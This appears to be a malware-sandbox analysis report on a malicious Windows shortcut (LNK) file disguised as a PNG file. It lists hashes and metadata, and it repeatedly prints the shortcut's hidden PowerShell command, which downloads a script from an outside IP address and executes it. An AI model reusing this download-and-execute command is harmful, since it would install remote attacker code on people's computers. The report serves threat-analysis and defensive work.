Malicious

583cbe6dd27498a0965ab9e0e54dd674

LNK File
|
MD5: 583cbe6dd27498a0965ab9e0e54dd674
|
Size: 218.08 KB
|
application/x-ms-shortcut

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	583cbe6dd27498a0965ab9e0e54dd674
Sha1	7a3b258aa7863b27fb3a2ee708b65d9eb6e18ffa
Sha256	908350ecfed89b9cff83be0c4789b47b0bd145a5e9ebf117dc535a0e787e5f48
Sha384	69ec1de6fd9ae31078d9a33a590334c739d442afc03275a67002ed11c27ba8f2e487bd8440d73b5209d2e3bd75cc3a90
Sha512	886cce97fa0a36a33d86bcc41edd0632fa1dc7593c039edcda0c02c07e94454a5019a92a2cd8b0a54d089ee69bff71fc32590a79d5fc4624b58eb84228355475
SSDeep	12:8d/Yta0oH/VU+f4SHo6is8X2ZniLXAU4oNBXf8XQLyD+ssMh/4xjb780Fj:8d/f/pfiKiLRNBP4DnPCF8ij
TLSH	D224F95092E50348FCF74F7CA937738159B5BE19FA91C3CC0160A14D6E70B65D85AF2A

File Structure

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe -w Hidden $w = New-Object Net.WebClient; $w.Headers.Add('User-Agent', 'UA WindowsPowerShell'); . ([ScriptBlock]::Create($w.DownloadString('http://86.54.42.162/dzgn/alpacafloor.ps1')))
Deobfuscated PowerShell	-w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://86.54.42.162/dzgn/alpacafloor.ps1")))
Deobfuscated PowerShell	shortcut: headersize: 76 76 linkclsid: "00021401-0000-0000-c000-000000000046" linkflags: @("HasLinkTargetIDList", "HasName", "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo") fileattributes: 0 creationtime: "12/4/2025" "3:24:36" "PM" accesstime: "12/4/2025" "3:24:36" "PM" writetime: "12/4/2025" "3:24:36" "PM" filesize: 0 0 iconindex: 116 showcommand: "SW_SHOWMINNOACTIVE" hotkey: 0 linktargetidlist: idlistsize: 395 395 displayname: "powershell" path: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" stringdata: namestring: "PNG" "Fil??" workingdir: "%APPDATA%" commandlinearguments: -w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://86.54.42.162/dzgn/alpacafloor.ps1"))) iconlocation: "imageres.dll"

583cbe6dd27498a0965ab9e0e54dd674 (218.08 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	powershell.exe -w Hidden $w = New-Object Net.WebClient; $w.Headers.Add('User-Agent', 'UA WindowsPowerShell'); . ([ScriptBlock]::Create($w.DownloadString('http://86.54.42.162/dzgn/alpacafloor.ps1'))) Malicious	583cbe6dd27498a0965ab9e0e54dd674
Deobfuscated PowerShell	-w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://86.54.42.162/dzgn/alpacafloor.ps1"))) Malicious	583cbe6dd27498a0965ab9e0e54dd674 > LNK CommandLine
Deobfuscated PowerShell	shortcut: headersize: 76 76 linkclsid: "00021401-0000-0000-c000-000000000046" linkflags: @("HasLinkTargetIDList", "HasName", "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo") fileattributes: 0 creationtime: "12/4/2025" "3:24:36" "PM" accesstime: "12/4/2025" "3:24:36" "PM" writetime: "12/4/2025" "3:24:36" "PM" filesize: 0 0 iconindex: 116 showcommand: "SW_SHOWMINNOACTIVE" hotkey: 0 linktargetidlist: idlistsize: 395 395 displayname: "powershell" path: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" stringdata: namestring: "PNG" "Fil??" workingdir: "%APPDATA%" commandlinearguments: -w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://86.54.42.162/dzgn/alpacafloor.ps1"))) iconlocation: "imageres.dll" Malicious	583cbe6dd27498a0965ab9e0e54dd674 > [Lnk Summary]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙